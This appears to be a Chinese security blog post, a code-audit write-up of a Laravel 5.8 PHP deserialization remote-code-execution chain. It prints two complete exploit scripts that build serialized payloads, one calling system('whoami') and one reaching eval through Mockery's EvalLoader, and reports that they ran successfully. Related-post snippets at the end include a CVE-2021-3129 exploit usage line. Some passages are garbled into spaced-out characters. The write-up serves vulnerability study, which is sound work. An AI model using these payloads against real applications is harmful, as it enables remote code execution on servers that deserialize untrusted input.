laravel 58 RCE分析(一条链子)

最新推荐文章于 2024-06-20 22:26:28 发布
最新推荐文章于 2024-06-20 22:26:28 发布
阅读量376 收藏
点赞数
分类专栏: 代码审计 文章标签: laravel
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51353029/article/details/117783895
版权

文章目录

写在最前面

之前审计过laravel54 55的框架,这次继续跟着WP审计一下laravel58,这次链子相比于前面两个框架,相比来说更为复杂一点,因此再审计的过程,建议读者不断回溯代码,理解每个参数变量的来源,环境搭建这里不做讲解了,直接进行分析

和laravel55 一样的EXP

首先依然是寻找_construct方法:这里找的是 :Illuminate\Broadcasting

在这里插入图片描述
_construct:

public function __destruct()
    {
        $this->events->dispatch($this->event);
    }

看看这里的dispatch方法:
在这里插入图片描述
这里的dispatch入口和laravel55一样,exp也一样,所以不再详细叙述,感兴趣的可以去看我的前一篇文章
给出EXP:

<?php

namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        function __construct($events, $parameter)
        {
            $this->events = $events;
            $this->event = $parameter;
        }
    }
}
namespace Illuminate\Events
{
    class Dispatcher
    {
        protected $listeners;

        function __construct($function, $parameter)
        {
            $this->listeners = [
                $parameter => [$function]
            ];
        }
    }
}
namespace{
    $b = new Illuminate\Events\Dispatcher('system','whoami');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b,'whoami');
    echo urlencode(serialize($a));
}

效果图:
在这里插入图片描述

寻找一个新的链子->dispatch:

漏洞分析:

入口点依然是从_destruct开始分析:Illuminate\Broadcasting
在这里插入图片描述
然后开始寻找一个新的dispatch。那么我们的events一定是去实例化一个类
最后我们找到一个存在RCE入口的dispatch类:namespace Illuminate\Bus
在这里插入图片描述一个看起来很简单的方法,跟进一下dispatchToQueue方法和dispatchNow方法:
dispatchNow方法:
在这里插入图片描述
dispatchToQueue方法:
在这里插入图片描述

很显然dispatchToQueue存再一个call_user_func_arry函数,dispatchNow看起来复杂且不是很好RCE,所以不管是从代码量还是类函数来讲,我们都愿意调用dispatchToQueue。

现在第一个小目标: 让$this->queueResolver && $this->commandShouldBeQueued($command)为真从而调用
跟进一下方法:
在这里插入图片描述

instanceof 判断$command是否是该类的实例化,
跟进一下ShouldQueue:

在这里插入图片描述
单纯的一个接口,那么很好办,只要存在 use Illuminate\Contracts\Queue\ShouldQueue即可,那么我们可以从存在该use语句的php中,寻找新的可利用函数,那这里没有什么限制条件,具体实例哪一个我们可以先放一放,至少现在可以确定,$event得值一定是实例化一个类,我们已经可以通过上述语句从而调用dispatchToQueue方法,下面仔细跟进一下这个方法:

在这里插入图片描述### 思路分析:
1.看到画横线的语句,$connection,这个参数是Dispatch里面不存在,再细看,$command->connection->connection ,而我们再前面已经说过了,$command是实例化一个含有 use Illuminate\Contracts\Queue\ShouldQueue的文件,那么我们就从这些文件中找到一个protected $connection 或者public $connetcion ,我们就可以控制$connection的值
2.这里确确实实存在call_user_func,但是,没有存在return $queue,也就是说我们RCE的结果没有出口返回,欸,这就很烦。要是有出口,就可以直接RCE一步到位了
3.虽然没有返回出口,但是call_user_func是调用方法,那么就有希望通过调用其他类的方法,找到RCE并且有返回出口的类,再一看,这个$this->queueResolver 是$commond->queueResolver,而我们再前面说过什么?$commond是实例化一个含有use Illuminate\Contracts\Queue\ShouldQueue,并且存在protected $connection 或者public $connetcion的,而该Dispatch.php本身含有protected $queueResolve ,这样才参数可控,我们可以寻找一个新的RCE入口,

继续分析:

这里寻找到的入口点:
Illuminate\Broadcasting\BroadcastEvent
在这里插入图片描述
Queuebal.php内存在可控的conneciton
在这里插入图片描述而这里我们寻找到的下一个方法,这里选择的是: Mockery\Loader\EvalLoader,因为该方法中存在eval ,所以,关于 q u e u e R e s o l v e r 的 值 应 该 是 实 例 化 queueResolver的值应该是实例化 queueResolverthis->queueResolver,并且调用load方法,所以,this->$queueResolver=array(new Mockery\Loader\EvalLoader(), “load”)
这里为什么这么写我还不是很清楚,但是看得懂,是实例化该类并且调用方法。

接下来进入load方法仔细查看如何RCE
在这里插入图片描述
这里的意思是,实例化MockDfinition为 d e f i n i t i o n 要 想 执 行 e v a l , 那 么 就 不 能 进 入 i f , 跟 进 看 看 definition 要想执行eval,那么就不能进入if,跟进看看 definitionevalifdefinition->getClassName

在这里插入图片描述
很好,这里参数可控
class_exists — 检查类是否已定义,那么这里随便定义config即可,只要不是一个已经被实例化的类
这样一来,if可以绕过了,最后就是eval这个地方进行RCE,code参数就是我们RCE的地方

最终EXP:

<?php
namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        protected $event;
        function __construct($evilCode)
        {
            $this->events = new \Illuminate\Bus\Dispatcher();
            $this->event = new BroadcastEvent($evilCode);
        }
    }

  class BroadcastEvent {
        public $connection;
        function __construct($evilCode)
        {
            $this->connection = new \Mockery\Generator\MockDefinition($evilCode);
        }
    }
}

namespace Illuminate\Bus {
    class Dispatcher {
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = [new \Mockery\Loader\EvalLoader(), 'load'];
        }
    }
}

namespace Mockery\Loader {
    class EvalLoader {}
}
namespace Mockery\Generator {
    class MockDefinition {
        protected $config;
        protected $code;
        function __construct($evilCode)
        {
            $this->code = $evilCode;
            $this->config = new MockConfiguration();
        }
    }
    class MockConfiguration {
        protected $name = 'abcdefg';
    }
}

namespace {
  $code = "<?php phpinfo(); exit; ?>";
  $exp = new \Illuminate\Broadcasting\PendingBroadcast($code);
  echo urlencode(serialize($exp));
}
?>

code就是RCE的地方
成功执行PHPINFO();
在这里插入图片描述
输出 seveen_1:
在这里插入图片描述

总结:

一个框架里面总会有很多类的函数可以RCE。从理解到复现链子就需要几个小时的时间,更别说,自主去寻找一个链子。还是那句话,函数在那,主要去找,总会找到的。这篇文章的laravel57跳板有两个,首先找到call_user_func,再通过call_user_func去找一个新的可以RCE的入口,相对于前面laravel54 55这两个链子来说,以前的链子更单一,找到一个类似RCE的入口就可以直接拿下来。所以这个框架相对来说难一点。

hahahahaha!
关注
专栏目录
Laravel Debug mode RCE(CVE-2021-3129)漏洞利用
z.mumu的博客
12-07 1476
访问Laravel 访问/_ignition/execute-solution 抓包 会出现如下页面 2. 检测 修改为POST,添加内容 并且修改 Content-Type: application/json { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
代码审计_PHPCMS_V9前台RCE挖掘分析1
08-03
代码审计_PHPCMS_V9前台RCE挖掘分析1
laravel58.rar
05-28
laravel5.8整合jwt,laravel5.8调用数据库查询,部署介绍看博客链接:https://blog.csdn.net/u010757785/article/details/90609924
一条laravel5.1的反序列化链子
fmyyy1的博客
09-22 444
title: 一条laravel5.1的链子 date: 2021-09-10 21:14:04 categories: 框架 comments: true toc: true ## 前言 挖一整天才挖出这一条,主要是钻牛角尖了,逮着一个地方使劲找链子。 poc 先放poc吧 <?php namespace Illuminate\Database\Eloquent { class FactoryBuilder { protected $definitions; .
ATT&CK(七)
最新发布
qq_52579508的博客
06-20 1126
目标地址: 10.10.10.10进行端口扫描端口还带有6376端口 ,redis数据库,先去看看web端存在 81 web 端口 ,进行访问是一个 Laravel v8.29.0 (PHP v7.4.14)对这个Laravel v8.29.0 进行搜索是否存在历史漏洞是存在RCE漏洞的Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。
laravel 5.5 RCE分析(四条链)
E1even的博客
06-08 508
一条链子(和5.4一样的链子) 依然是找到_destruct函数,这里我们依然先从54漏洞的位置来分析: 再寻找_call函数之前,先梳理一下我们通过_call方法的思路: 首先events变量是要去实例化一个类,而且这个类中不存在dispatch方法或者可以被我们RCERCE这种情况概率不大基本可以忽略,其次dispatch应该是一个可控的数组,我们通过这个可控的数组传入system命令,然后event就是我们的cmd 思路清楚了,再来开始审计把: 寻找_call方法: 同样还是找到了larave
Laravel RCE(CVE-2021-3129)复现
m0_64815693的博客
01-27 2412
CVE-2021-3129漏洞复现 Laravel Debug mode RCE
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log ' uname -a ' 参考
CVE-2021-3129:Laravel调试RCE
05-26
Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar...
Nacos JRaft Hessian 反序列化 RCE 分析.pdf
04-22
通过以上分析可以看出,Nacos JRaft Hessian 反序列化 RCE 分析是一个复杂的技术过程,涉及到多个技术细节和安全考虑。开发者和运维人员需要深入了解其工作原理,才能更好地预防和解决类似的安全问题。
CVE-2019-9081:laravel框架序列化RCE复现分析
bamanju0574的博客
09-10 657
这里贴上两篇大佬的分析的帖子 本人习惯把平常的一些笔记或者好的帖子记录在自己的博客当中,便于之后遇到同样的漏洞时快速打开思路 1.https://xz.aliyun.com/t/5510#toc-8 2.https://skysec.top/2019/07/22/CVE-2019-9081-Laravel-Deserialization-RCE-Vulnerability/#%E6...
laravel 5.4 RCE分析(2条链)
E1even的博客
06-07 246
在此之前看过其他师傅的审计文章,看完之后想自己审计出几条链子 找到destruct函数: 跟进一下这几个参数: 首先是events: 发现events是可控的 event同样可控,再跟进一下dispatch函数 很多地方都定义了function dispatch 函数 再来看一下我们的入口点__destruct()函数:有两个思路:第一个是调用_call方法,看看能不能调用方法进行命令执行。第二个方法是再dispatch函数里面去寻找可以命令执行的函数 public function __dest
Laravel反序列化实现RCE
p4nic的博客
08-28 670
Laravel反序列化实现RCE,版本5.1和7.30
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 3133
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
php laravel框架 rce分析 cve-2018-15133
whatday的专栏
08-30 1890
本文将记录在APP_KEY泄露情况下的Laravel RCE漏洞。该漏洞可以分别在两个地方触发,一个是直接添加在cookie字段,例如:Cookie: ATTACK=payload;另一处是在HTTP Header处添加X-XSRF-TOKEN字段,例如:X-XSRF-TOKEN: payload。漏洞影响版本:5.5.x<=5.5.40、5.6.x<=5.6.29。 环境搭建 这里我的测试环境为Debian9+apache+PHP7.2+Laravel5.6....
深入理解Laravel(CVE-2021-3129)RCE漏洞(超2万字从源码分析黑客攻击流程)
weixin_42100387的博客
11-21 1229
深入理解Laravel(CVE-2021-3129)RCE漏洞(超2万字从源码分析黑客攻击流程)
2023年红队渗透-开发框架可利用漏洞汇总
apple_52661176的博客
09-05 478
Spring Cloud Function提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供了一个好用的框架。4.3 Spring Framework远程代码执行漏洞 CVE-2022-22965。2 访问jsp触发后门。
【vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现
一剑开天门!的博客
02-26 2887
【vulfocus漏洞复现】Laravel Debug mode RCE(CVE-2021-3129)复现(由于本人现在还比较菜,勿喷!)
LightCMS后台Phar反序列化RCE分析
"LightCMS全版本后台存在 Remote Code Execution (RCE) 0day漏洞,该漏洞通过Phar反序列化技术利用Laravel框架的弱点。攻击者可以通过图像上传功能上传phar文件,并通过特定的控制器方法触发RCE分析过程中涉及到的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值